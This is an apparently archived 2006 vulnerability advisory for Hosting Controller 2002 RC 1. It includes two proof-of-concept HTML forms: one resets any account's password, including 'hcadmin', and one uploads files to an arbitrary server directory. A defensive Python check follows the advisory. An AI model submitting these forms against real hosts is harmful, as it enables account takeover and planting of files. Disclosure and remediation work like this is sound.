SECURITYVULNS:DOC:12069
Apr 04, 2006

Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
I've found 2 vulnerabilities in Hosting Controller that allow remote
authenticated users to change every user password or upload files in every
directory. Here are the PoCs:

This allows modifying passwords:
<form action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser" method="post">
Username: <input name="UserName" value="hcadmin" type="text" size="50">
<br>
Name: <input name="FullName" value="g|25|h" type="text" size="50">
<br>
ChangePass (type true): <input type="checkbox" name="PassCheck" value="TRUE">
<br>
Password: <input name="Pass1" title="Password">
<br>
Confirm: <input name="ConfPass" title="Password">
<br>
<input name="submit" value="submit" type="submit">

</form>
<br>
PS: You should have authenticated access.<br>
<br>

-------------------------<br>
Vulnerable versions:<br>
- HC 2002 RC 1<br>
Other versions may be vulnerable

And this allows uploading:
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test">
<br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have
authenticated access.
</form>
<br>

-------------------------<br>
Vulnerable versions:<br>
- HC 2002 RC 1<br>
Other versions may be vulnerable

These vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.

Sorry for my English, but I'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----
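
Both forms above succeed because the request names its own target: the UserName field picks the account to change and the OpenPath field picks the upload directory. The following is an added example, not part of the original advisory and not Hosting Controller code, showing in Python the two server-side checks that close this class of bug; the Session fields, the role names and the per-account web root are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any OS


class Session:
    """Hypothetical server-side session record (field names are assumptions)."""
    def __init__(self, user, role, web_root):
        self.user = user          # authenticated login name
        self.role = role          # "admin" or "user" (assumed role model)
        self.web_root = web_root  # only directory this account may write to


def may_update_user(session, target_user):
    """UpdateUser is allowed on the caller's own account, or for admins."""
    if session.role == "admin":
        return True
    return target_user.strip().lower() == session.user.lower()


def resolve_upload_dir(session, open_path):
    """Return the canonical upload directory, or None if it leaves web_root."""
    root = ntpath.normcase(ntpath.normpath(session.web_root))
    # join() lets an absolute OpenPath replace the root, so the containment
    # test below must run on the joined, normalized result.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, open_path)))
    try:
        inside = ntpath.commonpath([root, candidate]) == root
    except ValueError:  # different drive or UNC share
        return None
    return candidate if inside else None


if __name__ == "__main__":
    # Constructed sample: an ordinary account replaying the advisory's values.
    s = Session("alice", "user", r"E:\webspace\alice")
    print(may_update_user(s, "hcadmin"))              # target from form 1
    print(resolve_upload_dir(s, r"E:\webspace\test"))  # path from form 2
    print(resolve_upload_dir(s, r"uploads\img"))
```

The path check is lexical only; a deployment would also need to resolve junctions and 8.3 short names before comparing.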